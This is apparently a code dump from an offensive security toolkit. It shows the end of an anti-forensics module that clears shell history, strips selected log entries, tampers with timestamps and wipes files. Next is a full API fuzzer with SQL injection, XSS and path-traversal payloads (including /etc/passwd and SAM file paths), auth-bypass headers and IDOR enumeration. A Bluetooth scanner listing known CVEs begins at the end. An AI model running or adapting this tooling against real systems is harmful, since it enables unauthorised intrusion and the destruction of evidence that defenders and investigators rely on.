return {'ok': False, 'error': 'Permission denied (need root?)'}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def remove_entries(filepath: str, pattern: str) -> Dict:
"""Remove specific entries matching a pattern from log file."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
with open(filepath, 'r', errors='ignore') as f:
lines = f.readlines()
original_count = len(lines)
filtered = [l for l in lines if not re.search(pattern, l, re.I)]
removed = original_count - len(filtered)
with open(filepath, 'w') as f:
f.writelines(filtered)
return {
'ok': True,
'file': filepath,
'original_lines': original_count,
'removed': removed,
'remaining': len(filtered)
}
except PermissionError:
return {'ok': False, 'error': 'Permission denied'}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def clear_bash_history() -> Dict:
"""Clear bash history."""
results = []
history_files = [
os.path.expanduser('~/.bash_history'),
os.path.expanduser('~/.zsh_history'),
os.path.expanduser('~/.python_history'),
]
for hf in history_files:
if os.path.exists(hf):
try:
size = os.path.getsize(hf)
with open(hf, 'w') as f:
pass
results.append({'file': hf, 'cleared': size})
except Exception:
pass
# Also clear in-memory history
try:
subprocess.run(['history', '-c'], shell=True, capture_output=True)
except Exception:
pass
return {'ok': True, 'cleared': results}
# ── Metadata Scrubbing ───────────────────────────────────────────────────────
class MetadataScrubber:
"""Remove identifying metadata from files."""
@staticmethod
def scrub_image(filepath: str, output: str = None) -> Dict:
"""Remove EXIF data from image."""
if not HAS_PIL:
return {'ok': False, 'error': 'Pillow not installed'}
try:
img = PILImage.open(filepath)
# Create clean copy without EXIF
clean = PILImage.new(img.mode, img.size)
clean.putdata(list(img.getdata()))
out_path = output or filepath
clean.save(out_path)
return {
'ok': True,
'file': out_path,
'message': 'EXIF data removed'
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def scrub_pdf_metadata(filepath: str) -> Dict:
"""Remove metadata from PDF (basic — rewrites info dict)."""
try:
with open(filepath, 'rb') as f:
data = f.read()
# Remove common metadata keys
for key in [b'/Author', b'/Creator', b'/Producer',
b'/Title', b'/Subject', b'/Keywords']:
# Simple regex replacement of metadata values
pattern = key + rb'\s*\([^)]*\)'
data = re.sub(pattern, key + b' ()', data)
with open(filepath, 'wb') as f:
f.write(data)
return {'ok': True, 'file': filepath, 'message': 'PDF metadata scrubbed'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Anti-Forensics Manager ──────────────────────────────────────────────────
class AntiForensicsManager:
"""Unified interface for anti-forensics operations."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'anti_forensics')
os.makedirs(self.data_dir, exist_ok=True)
self.delete = SecureDelete()
self.timestamps = TimestampManip()
self.logs = LogCleaner()
self.scrubber = MetadataScrubber()
self.audit_log: List[Dict] = []
def _log_action(self, action: str, target: str, details: str = ''):
"""Internal audit log (ironic for anti-forensics)."""
self.audit_log.append({
'timestamp': datetime.now(timezone.utc).isoformat(),
'action': action,
'target': target,
'details': details
})
def get_capabilities(self) -> Dict:
"""Check available capabilities."""
return {
'secure_delete': True,
'timestamp_manip': True,
'log_clearing': True,
'metadata_scrub_image': HAS_PIL,
'metadata_scrub_pdf': True,
'free_space_wipe': True,
}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_anti_forensics() -> AntiForensicsManager:
global _instance
if _instance is None:
_instance = AntiForensicsManager()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Anti-Forensics module."""
mgr = get_anti_forensics()
while True:
print(f"\n{'='*60}")
print(f" Anti-Forensics Toolkit")
print(f"{'='*60}")
print()
print(" 1 — Secure Delete File")
print(" 2 — Secure Delete Directory")
print(" 3 — Wipe Free Space")
print(" 4 — View File Timestamps")
print(" 5 — Set Timestamps")
print(" 6 — Clone Timestamps")
print(" 7 — Randomize Timestamps")
print(" 8 — List System Logs")
print(" 9 — Clear Log File")
print(" 10 — Remove Log Entries (pattern)")
print(" 11 — Clear Shell History")
print(" 12 — Scrub Image Metadata")
print(" 13 — Scrub PDF Metadata")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
path = input(" File path: ").strip()
passes = input(" Overwrite passes (default 3): ").strip()
if path:
result = mgr.delete.secure_delete_file(path, int(passes) if passes.isdigit() else 3)
print(f" {result.get('message', result.get('error'))}")
elif choice == '2':
path = input(" Directory path: ").strip()
if path:
confirm = input(f" DELETE ALL in {path}? (yes/no): ").strip()
if confirm == 'yes':
result = mgr.delete.secure_delete_directory(path)
print(f" Deleted {result.get('files_deleted', 0)} files, {result.get('errors', 0)} errors")
elif choice == '3':
mount = input(" Mount point: ").strip()
if mount:
result = mgr.delete.wipe_free_space(mount)
if result['ok']:
print(f" Wiped {result['wiped_mb']} MB of free space")
else:
print(f" Error: {result['error']}")
elif choice == '4':
path = input(" File path: ").strip()
if path:
result = mgr.timestamps.get_timestamps(path)
if result['ok']:
print(f" Accessed: {result['accessed']}")
print(f" Modified: {result['modified']}")
print(f" Created: {result['created']}")
elif choice == '5':
path = input(" File path: ").strip()
date_str = input(" Date (YYYY-MM-DD HH:MM:SS): ").strip()
if path and date_str:
try:
ts = datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S').timestamp()
result = mgr.timestamps.set_timestamps(path, ts, ts)
print(f" Timestamps set to {date_str}")
except ValueError:
print(" Invalid date format")
elif choice == '6':
source = input(" Source file: ").strip()
target = input(" Target file: ").strip()
if source and target:
result = mgr.timestamps.clone_timestamps(source, target)
print(f" {result.get('message', result.get('error'))}")
elif choice == '7':
path = input(" File path: ").strip()
if path:
result = mgr.timestamps.randomize_timestamps(path)
if result['ok']:
print(f" Set to: {result.get('modified', '?')}")
elif choice == '8':
logs = mgr.logs.list_logs()
for l in logs:
writable = 'writable' if l['writable'] else 'read-only'
print(f" {l['path']} ({l['size']} bytes) [{writable}]")
elif choice == '9':
path = input(" Log file path: ").strip()
if path:
result = mgr.logs.clear_log(path)
if result['ok']:
print(f" Cleared {result['cleared_bytes']} bytes")
else:
print(f" {result['error']}")
elif choice == '10':
path = input(" Log file path: ").strip()
pattern = input(" Pattern to remove: ").strip()
if path and pattern:
result = mgr.logs.remove_entries(path, pattern)
if result['ok']:
print(f" Removed {result['removed']} of {result['original_lines']} lines")
else:
print(f" {result['error']}")
elif choice == '11':
result = mgr.logs.clear_bash_history()
for c in result['cleared']:
print(f" Cleared {c['file']} ({c['cleared']} bytes)")
elif choice == '12':
path = input(" Image path: ").strip()
if path:
result = mgr.scrubber.scrub_image(path)
print(f" {result.get('message', result.get('error'))}")
elif choice == '13':
path = input(" PDF path: ").strip()
if path:
result = mgr.scrubber.scrub_pdf_metadata(path)
print(f" {result.get('message', result.get('error'))}")

742
modules/api_fuzzer.py Normal file
View File

@@ -0,0 +1,742 @@
"""AUTARCH API Fuzzer
Endpoint discovery, parameter fuzzing, auth testing, rate limit detection,
GraphQL introspection, and response analysis for REST/GraphQL APIs.
"""
DESCRIPTION = "API endpoint fuzzing & vulnerability testing"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import copy
import threading
from pathlib import Path
from urllib.parse import urljoin, urlparse, parse_qs
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
import requests
from requests.exceptions import RequestException
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
# ── Fuzz Payloads ────────────────────────────────────────────────────────────
SQLI_PAYLOADS = [
"' OR '1'='1", "\" OR \"1\"=\"1", "'; DROP TABLE--", "1; SELECT 1--",
"' UNION SELECT NULL--", "1' AND '1'='1", "admin'--", "' OR 1=1#",
"1 AND 1=1", "1' ORDER BY 1--", "') OR ('1'='1",
]
XSS_PAYLOADS = [
"<script>alert(1)</script>", "'\"><img src=x onerror=alert(1)>",
"javascript:alert(1)", "<svg/onload=alert(1)>", "{{7*7}}",
"${7*7}", "<%=7*7%>", "{{constructor.constructor('return 1')()}}",
]
TYPE_CONFUSION = [
None, True, False, 0, -1, 2147483647, -2147483648,
99999999999999, 0.1, -0.1, float('inf'),
"", " ", "null", "undefined", "NaN", "true", "false",
[], {}, [None], {"__proto__": {}},
"A" * 1000, "A" * 10000,
]
TRAVERSAL_PAYLOADS = [
"../../../etc/passwd", "..\\..\\..\\windows\\system32\\config\\sam",
"....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f",
"/etc/passwd%00", "..%252f..%252f",
]
COMMON_ENDPOINTS = [
'/api', '/api/v1', '/api/v2', '/api/v3',
'/api/users', '/api/admin', '/api/login', '/api/auth',
'/api/config', '/api/settings', '/api/debug', '/api/health',
'/api/status', '/api/info', '/api/version', '/api/docs',
'/api/swagger', '/api/graphql', '/api/internal',
'/swagger.json', '/swagger-ui', '/openapi.json',
'/api/tokens', '/api/keys', '/api/secrets',
'/api/upload', '/api/download', '/api/export', '/api/import',
'/api/search', '/api/query', '/api/execute', '/api/run',
'/graphql', '/graphiql', '/playground',
'/.well-known/openid-configuration',
'/api/password/reset', '/api/register', '/api/verify',
'/api/webhook', '/api/callback', '/api/notify',
'/actuator', '/actuator/health', '/actuator/env',
'/metrics', '/prometheus', '/_debug', '/__debug__',
]
# ── API Fuzzer Engine ────────────────────────────────────────────────────────
class APIFuzzer:
"""REST & GraphQL API security testing."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'api_fuzzer')
os.makedirs(self.data_dir, exist_ok=True)
self.session = requests.Session() if HAS_REQUESTS else None
self.results: List[Dict] = []
self._jobs: Dict[str, Dict] = {}
def set_auth(self, auth_type: str, value: str, header_name: str = 'Authorization'):
"""Configure authentication for requests."""
if not self.session:
return
if auth_type == 'bearer':
self.session.headers[header_name] = f'Bearer {value}'
elif auth_type == 'api_key':
self.session.headers[header_name] = value
elif auth_type == 'basic':
parts = value.split(':', 1)
if len(parts) == 2:
self.session.auth = (parts[0], parts[1])
elif auth_type == 'cookie':
self.session.cookies.set('session', value)
elif auth_type == 'custom':
self.session.headers[header_name] = value
def clear_auth(self):
"""Clear authentication."""
if self.session:
self.session.headers.pop('Authorization', None)
self.session.auth = None
self.session.cookies.clear()
# ── Endpoint Discovery ───────────────────────────────────────────────
def discover_endpoints(self, base_url: str, custom_paths: List[str] = None,
threads: int = 10) -> str:
"""Discover API endpoints. Returns job_id."""
job_id = f'discover_{int(time.time())}'
self._jobs[job_id] = {
'type': 'discover', 'status': 'running',
'found': [], 'checked': 0, 'total': 0
}
def _discover():
paths = COMMON_ENDPOINTS + (custom_paths or [])
self._jobs[job_id]['total'] = len(paths)
found = []
def check_path(path):
try:
url = urljoin(base_url.rstrip('/') + '/', path.lstrip('/'))
resp = self.session.get(url, timeout=5, allow_redirects=False)
self._jobs[job_id]['checked'] += 1
if resp.status_code < 404:
entry = {
'path': path,
'url': url,
'status': resp.status_code,
'content_type': resp.headers.get('content-type', ''),
'size': len(resp.content),
'methods': []
}
# Check allowed methods via OPTIONS
try:
opts = self.session.options(url, timeout=3)
allow = opts.headers.get('Allow', '')
if allow:
entry['methods'] = [m.strip() for m in allow.split(',')]
except Exception:
pass
found.append(entry)
except Exception:
self._jobs[job_id]['checked'] += 1
# Thread pool
active_threads = []
for path in paths:
t = threading.Thread(target=check_path, args=(path,))
t.start()
active_threads.append(t)
if len(active_threads) >= threads:
for at in active_threads:
at.join(timeout=10)
active_threads.clear()
for t in active_threads:
t.join(timeout=10)
self._jobs[job_id]['found'] = found
self._jobs[job_id]['status'] = 'complete'
threading.Thread(target=_discover, daemon=True).start()
return job_id
def parse_openapi(self, url_or_path: str) -> Dict:
"""Parse OpenAPI/Swagger spec to extract endpoints."""
try:
if url_or_path.startswith('http'):
resp = self.session.get(url_or_path, timeout=10)
spec = resp.json()
else:
with open(url_or_path) as f:
spec = json.load(f)
endpoints = []
paths = spec.get('paths', {})
for path, methods in paths.items():
for method, details in methods.items():
if method.upper() in ('GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS'):
params = []
for p in details.get('parameters', []):
params.append({
'name': p.get('name'),
'in': p.get('in'),
'required': p.get('required', False),
'type': p.get('schema', {}).get('type', 'string')
})
endpoints.append({
'path': path,
'method': method.upper(),
'summary': details.get('summary', ''),
'parameters': params,
'tags': details.get('tags', [])
})
return {
'ok': True,
'title': spec.get('info', {}).get('title', ''),
'version': spec.get('info', {}).get('version', ''),
'endpoints': endpoints,
'count': len(endpoints)
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Parameter Fuzzing ────────────────────────────────────────────────
def fuzz_params(self, url: str, method: str = 'GET',
params: Dict = None, payload_type: str = 'type_confusion') -> Dict:
"""Fuzz API parameters with various payloads."""
if not self.session:
return {'ok': False, 'error': 'requests not available'}
if payload_type == 'sqli':
payloads = SQLI_PAYLOADS
elif payload_type == 'xss':
payloads = XSS_PAYLOADS
elif payload_type == 'traversal':
payloads = TRAVERSAL_PAYLOADS
else:
payloads = TYPE_CONFUSION
params = params or {}
findings = []
for param_name, original_value in params.items():
for payload in payloads:
fuzzed = copy.deepcopy(params)
fuzzed[param_name] = payload
try:
if method.upper() == 'GET':
resp = self.session.get(url, params=fuzzed, timeout=10)
else:
resp = self.session.request(method.upper(), url, json=fuzzed, timeout=10)
# Analyze response for anomalies
finding = self._analyze_fuzz_response(
resp, param_name, payload, payload_type
)
if finding:
findings.append(finding)
except RequestException as e:
if 'timeout' not in str(e).lower():
findings.append({
'param': param_name,
'payload': str(payload),
'type': 'error',
'detail': str(e)
})
return {'ok': True, 'findings': findings, 'tested': len(params) * len(payloads)}
def _analyze_fuzz_response(self, resp, param: str, payload, payload_type: str) -> Optional[Dict]:
"""Analyze response for vulnerability indicators."""
body = resp.text.lower()
finding = None
# SQL error detection
sql_errors = [
'sql syntax', 'mysql_fetch', 'pg_query', 'sqlite3',
'unclosed quotation', 'unterminated string', 'syntax error',
'odbc', 'oracle error', 'microsoft ole db', 'ora-0'
]
if payload_type == 'sqli' and any(e in body for e in sql_errors):
finding = {
'param': param, 'payload': str(payload),
'type': 'sqli', 'severity': 'high',
'detail': 'SQL error in response',
'status': resp.status_code
}
# XSS reflection
if payload_type == 'xss' and str(payload).lower() in body:
finding = {
'param': param, 'payload': str(payload),
'type': 'xss_reflected', 'severity': 'high',
'detail': 'Payload reflected in response',
'status': resp.status_code
}
# Path traversal
if payload_type == 'traversal':
traversal_indicators = ['root:', '/bin/', 'windows\\system32', '[boot loader]']
if any(t in body for t in traversal_indicators):
finding = {
'param': param, 'payload': str(payload),
'type': 'path_traversal', 'severity': 'critical',
'detail': 'File content in response',
'status': resp.status_code
}
# Server error (500) might indicate injection
if resp.status_code == 500 and not finding:
finding = {
'param': param, 'payload': str(payload),
'type': 'server_error', 'severity': 'medium',
'detail': f'Server error (500) triggered',
'status': resp.status_code
}
# Stack trace / debug info disclosure
debug_indicators = [
'traceback', 'stacktrace', 'exception', 'debug',
'at line', 'file "/', 'internal server error'
]
if any(d in body for d in debug_indicators) and not finding:
finding = {
'param': param, 'payload': str(payload),
'type': 'info_disclosure', 'severity': 'medium',
'detail': 'Debug/stack trace in response',
'status': resp.status_code
}
return finding
# ── Auth Testing ─────────────────────────────────────────────────────
def test_idor(self, url_template: str, id_range: Tuple[int, int],
auth_token: str = None) -> Dict:
"""Test for IDOR by iterating IDs."""
findings = []
start_id, end_id = id_range
if auth_token:
self.session.headers['Authorization'] = f'Bearer {auth_token}'
for i in range(start_id, end_id + 1):
url = url_template.replace('{id}', str(i))
try:
resp = self.session.get(url, timeout=5)
if resp.status_code == 200:
findings.append({
'id': i, 'url': url,
'status': resp.status_code,
'size': len(resp.content),
'accessible': True
})
elif resp.status_code not in (401, 403, 404):
findings.append({
'id': i, 'url': url,
'status': resp.status_code,
'accessible': False,
'note': f'Unexpected status: {resp.status_code}'
})
except Exception:
pass
return {
'ok': True, 'findings': findings,
'accessible_count': sum(1 for f in findings if f.get('accessible')),
'tested': end_id - start_id + 1
}
def test_auth_bypass(self, url: str) -> Dict:
"""Test common auth bypass techniques."""
bypasses = []
tests = [
('No auth header', {}),
('Empty Bearer', {'Authorization': 'Bearer '}),
('Bearer null', {'Authorization': 'Bearer null'}),
('Bearer undefined', {'Authorization': 'Bearer undefined'}),
('Admin header', {'X-Admin': 'true'}),
('Internal header', {'X-Forwarded-For': '127.0.0.1'}),
('Override method', {'X-HTTP-Method-Override': 'GET'}),
('Original URL', {'X-Original-URL': '/admin'}),
]
for name, headers in tests:
try:
resp = requests.get(url, headers=headers, timeout=5)
if resp.status_code == 200:
bypasses.append({
'technique': name,
'status': resp.status_code,
'size': len(resp.content),
'success': True
})
else:
bypasses.append({
'technique': name,
'status': resp.status_code,
'success': False
})
except Exception:
pass
return {
'ok': True,
'bypasses': bypasses,
'successful': sum(1 for b in bypasses if b.get('success'))
}
# ── Rate Limiting ────────────────────────────────────────────────────
def test_rate_limit(self, url: str, requests_count: int = 50,
method: str = 'GET') -> Dict:
"""Test API rate limiting."""
results = []
start_time = time.time()
for i in range(requests_count):
try:
resp = self.session.request(method, url, timeout=10)
results.append({
'request_num': i + 1,
'status': resp.status_code,
'time': time.time() - start_time,
'rate_limit_remaining': resp.headers.get('X-RateLimit-Remaining', ''),
'retry_after': resp.headers.get('Retry-After', '')
})
if resp.status_code == 429:
break
except Exception as e:
results.append({
'request_num': i + 1,
'error': str(e),
'time': time.time() - start_time
})
rate_limited = any(r.get('status') == 429 for r in results)
elapsed = time.time() - start_time
return {
'ok': True,
'rate_limited': rate_limited,
'total_requests': len(results),
'elapsed_seconds': round(elapsed, 2),
'rps': round(len(results) / elapsed, 1) if elapsed > 0 else 0,
'limit_hit_at': next((r['request_num'] for r in results if r.get('status') == 429), None),
'results': results
}
# ── GraphQL ──────────────────────────────────────────────────────────
def graphql_introspect(self, url: str) -> Dict:
"""Run GraphQL introspection query."""
query = {
'query': '''
{
__schema {
types {
name
kind
fields {
name
type { name kind }
args { name type { name } }
}
}
queryType { name }
mutationType { name }
}
}
'''
}
try:
resp = self.session.post(url, json=query, timeout=15)
data = resp.json()
if 'errors' in data and not data.get('data'):
return {'ok': False, 'error': 'Introspection disabled or error',
'errors': data['errors']}
schema = data.get('data', {}).get('__schema', {})
types = []
for t in schema.get('types', []):
if not t['name'].startswith('__'):
types.append({
'name': t['name'],
'kind': t['kind'],
'fields': [
{'name': f['name'],
'type': f['type'].get('name', f['type'].get('kind', '')),
'args': [a['name'] for a in f.get('args', [])]}
for f in (t.get('fields') or [])
]
})
return {
'ok': True,
'query_type': schema.get('queryType', {}).get('name'),
'mutation_type': schema.get('mutationType', {}).get('name'),
'types': types,
'type_count': len(types)
}
except Exception as e:
return {'ok': False, 'error': str(e)}
def graphql_depth_test(self, url: str, max_depth: int = 10) -> Dict:
"""Test GraphQL query depth limits."""
results = []
for depth in range(1, max_depth + 1):
# Build nested query
inner = '{ __typename }'
for _ in range(depth):
inner = f'{{ __schema {{ types {inner} }} }}'
try:
resp = self.session.post(url, json={'query': inner}, timeout=10)
results.append({
'depth': depth,
'status': resp.status_code,
'has_errors': 'errors' in resp.json() if resp.headers.get('content-type', '').startswith('application/json') else None
})
if resp.status_code != 200:
break
except Exception:
results.append({'depth': depth, 'error': True})
break
max_allowed = max((r['depth'] for r in results if r.get('status') == 200), default=0)
return {
'ok': True,
'max_depth_allowed': max_allowed,
'depth_limited': max_allowed < max_depth,
'results': results
}
# ── Response Analysis ────────────────────────────────────────────────
def analyze_response(self, url: str, method: str = 'GET') -> Dict:
"""Analyze API response for security issues."""
try:
resp = self.session.request(method, url, timeout=10)
issues = []
# Check security headers
security_headers = {
'X-Content-Type-Options': 'nosniff',
'X-Frame-Options': 'DENY|SAMEORIGIN',
'Strict-Transport-Security': None,
'Content-Security-Policy': None,
'X-XSS-Protection': None,
}
for header, expected in security_headers.items():
val = resp.headers.get(header)
if not val:
issues.append({
'type': 'missing_header',
'header': header,
'severity': 'low'
})
# Check for info disclosure
server = resp.headers.get('Server', '')
if server and any(v in server.lower() for v in ['apache/', 'nginx/', 'iis/']):
issues.append({
'type': 'server_disclosure',
'value': server,
'severity': 'info'
})
powered_by = resp.headers.get('X-Powered-By', '')
if powered_by:
issues.append({
'type': 'technology_disclosure',
'value': powered_by,
'severity': 'low'
})
# Check CORS
cors = resp.headers.get('Access-Control-Allow-Origin', '')
if cors == '*':
issues.append({
'type': 'open_cors',
'value': cors,
'severity': 'medium'
})
# Check for error/debug info in body
body = resp.text.lower()
if any(kw in body for kw in ['stack trace', 'traceback', 'debug mode']):
issues.append({
'type': 'debug_info',
'severity': 'medium',
'detail': 'Debug/stack trace information in response'
})
return {
'ok': True,
'url': url,
'status': resp.status_code,
'headers': dict(resp.headers),
'issues': issues,
'issue_count': len(issues)
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
return self._jobs.get(job_id)
def list_jobs(self) -> List[Dict]:
return [{'id': k, **v} for k, v in self._jobs.items()]
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_api_fuzzer() -> APIFuzzer:
global _instance
if _instance is None:
_instance = APIFuzzer()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for API Fuzzer module."""
if not HAS_REQUESTS:
print(" Error: requests library not installed")
return
fuzzer = get_api_fuzzer()
while True:
print(f"\n{'='*60}")
print(f" API Fuzzer")
print(f"{'='*60}")
print()
print(" 1 — Discover Endpoints")
print(" 2 — Parse OpenAPI Spec")
print(" 3 — Fuzz Parameters")
print(" 4 — Test Auth Bypass")
print(" 5 — Test IDOR")
print(" 6 — Test Rate Limiting")
print(" 7 — GraphQL Introspection")
print(" 8 — Analyze Response")
print(" 9 — Set Authentication")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
base = input(" Base URL: ").strip()
if base:
job_id = fuzzer.discover_endpoints(base)
print(f" Discovery started (job: {job_id})")
while True:
job = fuzzer.get_job(job_id)
if job['status'] == 'complete':
print(f" Found {len(job['found'])} endpoints:")
for ep in job['found']:
print(f" [{ep['status']}] {ep['path']} "
f"({ep['content_type'][:30]})")
break
print(f" Checking... {job['checked']}/{job['total']}")
time.sleep(1)
elif choice == '2':
url = input(" OpenAPI spec URL or file: ").strip()
if url:
result = fuzzer.parse_openapi(url)
if result['ok']:
print(f" API: {result['title']} v{result['version']}")
print(f" Endpoints: {result['count']}")
for ep in result['endpoints'][:20]:
print(f" {ep['method']:<6} {ep['path']} {ep.get('summary', '')}")
else:
print(f" Error: {result['error']}")
elif choice == '3':
url = input(" Endpoint URL: ").strip()
param_str = input(" Parameters (key=val,key=val): ").strip()
ptype = input(" Payload type (sqli/xss/traversal/type_confusion): ").strip() or 'type_confusion'
if url and param_str:
params = dict(p.split('=', 1) for p in param_str.split(',') if '=' in p)
result = fuzzer.fuzz_params(url, params=params, payload_type=ptype)
if result['ok']:
print(f" Tested {result['tested']} combinations, {len(result['findings'])} findings:")
for f in result['findings']:
print(f" [{f.get('severity', '?')}] {f['type']}: {f['param']} = {f['payload'][:50]}")
elif choice == '4':
url = input(" Protected URL: ").strip()
if url:
result = fuzzer.test_auth_bypass(url)
print(f" Tested {len(result['bypasses'])} techniques, {result['successful']} successful")
for b in result['bypasses']:
status = 'BYPASSED' if b['success'] else f'blocked ({b["status"]})'
print(f" {b['technique']}: {status}")
elif choice == '6':
url = input(" URL to test: ").strip()
count = input(" Request count (default 50): ").strip()
if url:
result = fuzzer.test_rate_limit(url, int(count) if count.isdigit() else 50)
print(f" Rate limited: {result['rate_limited']}")
print(f" RPS: {result['rps']} | Total: {result['total_requests']} in {result['elapsed_seconds']}s")
if result['limit_hit_at']:
print(f" Limit hit at request #{result['limit_hit_at']}")
elif choice == '7':
url = input(" GraphQL URL: ").strip()
if url:
result = fuzzer.graphql_introspect(url)
if result['ok']:
print(f" Found {result['type_count']} types")
for t in result['types'][:10]:
print(f" {t['kind']}: {t['name']} ({len(t['fields'])} fields)")
else:
print(f" Error: {result['error']}")
elif choice == '8':
url = input(" URL: ").strip()
if url:
result = fuzzer.analyze_response(url)
if result['ok']:
print(f" Status: {result['status']} | Issues: {result['issue_count']}")
for issue in result['issues']:
print(f" [{issue['severity']}] {issue['type']}: {issue.get('value', issue.get('detail', ''))}")
elif choice == '9':
auth_type = input(" Auth type (bearer/api_key/basic/cookie): ").strip()
value = input(" Value: ").strip()
if auth_type and value:
fuzzer.set_auth(auth_type, value)
print(" Authentication configured")

555
modules/ble_scanner.py Normal file
View File

@@ -0,0 +1,555 @@
"""AUTARCH BLE Scanner
Bluetooth Low Energy device discovery, service enumeration, characteristic
read/write, vulnerability scanning, and proximity tracking.
"""
DESCRIPTION = "BLE device scanning & security analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import threading
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# Optional BLE library
try:
import asyncio
from bleak import BleakScanner, BleakClient
HAS_BLEAK = True
except ImportError:
HAS_BLEAK = False
# ── Known Service UUIDs ──────────────────────────────────────────────────────
KNOWN_SERVICES = {
'00001800-0000-1000-8000-00805f9b34fb': 'Generic Access',
'00001801-0000-1000-8000-00805f9b34fb': 'Generic Attribute',
'0000180a-0000-1000-8000-00805f9b34fb': 'Device Information',
'0000180f-0000-1000-8000-00805f9b34fb': 'Battery Service',
'00001812-0000-1000-8000-00805f9b34fb': 'Human Interface Device',
'0000180d-0000-1000-8000-00805f9b34fb': 'Heart Rate',
'00001809-0000-1000-8000-00805f9b34fb': 'Health Thermometer',
'00001802-0000-1000-8000-00805f9b34fb': 'Immediate Alert',
'00001803-0000-1000-8000-00805f9b34fb': 'Link Loss',
'00001804-0000-1000-8000-00805f9b34fb': 'Tx Power',
'00001805-0000-1000-8000-00805f9b34fb': 'Current Time',
'00001808-0000-1000-8000-00805f9b34fb': 'Glucose',
'00001810-0000-1000-8000-00805f9b34fb': 'Blood Pressure',
'00001813-0000-1000-8000-00805f9b34fb': 'Scan Parameters',
'00001816-0000-1000-8000-00805f9b34fb': 'Cycling Speed & Cadence',
'00001818-0000-1000-8000-00805f9b34fb': 'Cycling Power',
'00001814-0000-1000-8000-00805f9b34fb': 'Running Speed & Cadence',
'0000fee0-0000-1000-8000-00805f9b34fb': 'Mi Band Service',
'0000feaa-0000-1000-8000-00805f9b34fb': 'Eddystone (Google)',
}
MANUFACTURER_IDS = {
0x004C: 'Apple',
0x0006: 'Microsoft',
0x000F: 'Texas Instruments',
0x0059: 'Nordic Semiconductor',
0x0075: 'Samsung',
0x00E0: 'Google',
0x0157: 'Xiaomi',
0x0171: 'Amazon',
0x02FF: 'Huawei',
0x0310: 'Fitbit',
}
KNOWN_VULNS = {
'KNOB': {
'description': 'Key Negotiation of Bluetooth Attack — downgrades encryption key entropy',
'cve': 'CVE-2019-9506',
'severity': 'high',
'check': 'Requires active MITM during pairing'
},
'BLESA': {
'description': 'BLE Spoofing Attack — reconnection spoofing without auth',
'cve': 'CVE-2020-9770',
'severity': 'medium',
'check': 'Affects reconnection after disconnect'
},
'SweynTooth': {
'description': 'Family of BLE implementation bugs causing crashes/deadlocks',
'cve': 'Multiple (CVE-2019-16336, CVE-2019-17519, etc.)',
'severity': 'high',
'check': 'Vendor-specific, requires firmware version check'
},
'BlueBorne': {
'description': 'Remote code execution via Bluetooth without pairing',
'cve': 'CVE-2017-0781 to CVE-2017-0785',
'severity': 'critical',
'check': 'Requires classic BT stack, pre-2018 devices vulnerable'
}
}
# ── BLE Scanner ──────────────────────────────────────────────────────────────
class BLEScanner:
"""Bluetooth Low Energy device scanner and analyzer."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'ble')
os.makedirs(self.data_dir, exist_ok=True)
self.devices: Dict[str, Dict] = {}
self.tracking_history: Dict[str, List[Dict]] = {}
self._scan_running = False
def is_available(self) -> bool:
"""Check if BLE scanning is available."""
return HAS_BLEAK
def get_status(self) -> Dict:
"""Get scanner status."""
return {
'available': HAS_BLEAK,
'devices_found': len(self.devices),
'scanning': self._scan_running,
'tracking': len(self.tracking_history)
}
# ── Scanning ─────────────────────────────────────────────────────────
def scan(self, duration: float = 10.0) -> Dict:
"""Scan for BLE devices."""
if not HAS_BLEAK:
return {'ok': False, 'error': 'bleak library not installed (pip install bleak)'}
self._scan_running = True
try:
loop = asyncio.new_event_loop()
devices = loop.run_until_complete(self._async_scan(duration))
loop.close()
results = []
for dev in devices:
info = self._parse_device(dev)
self.devices[info['address']] = info
results.append(info)
self._scan_running = False
return {
'ok': True,
'devices': results,
'count': len(results),
'duration': duration
}
except Exception as e:
self._scan_running = False
return {'ok': False, 'error': str(e)}
async def _async_scan(self, duration: float):
"""Async BLE scan."""
devices = await BleakScanner.discover(timeout=duration, return_adv=True)
return devices
def _parse_device(self, dev_adv) -> Dict:
"""Parse BLE device advertisement data."""
if isinstance(dev_adv, tuple):
dev, adv = dev_adv
else:
dev = dev_adv
adv = None
info = {
'address': str(dev.address) if hasattr(dev, 'address') else str(dev),
'name': dev.name if hasattr(dev, 'name') else 'Unknown',
'rssi': dev.rssi if hasattr(dev, 'rssi') else (adv.rssi if adv and hasattr(adv, 'rssi') else 0),
'services': [],
'manufacturer': 'Unknown',
'device_type': 'unknown',
'connectable': True,
'last_seen': datetime.now(timezone.utc).isoformat(),
}
# Parse advertisement data
if adv:
# Service UUIDs
if hasattr(adv, 'service_uuids'):
for uuid in adv.service_uuids:
service_name = KNOWN_SERVICES.get(uuid.lower(), uuid)
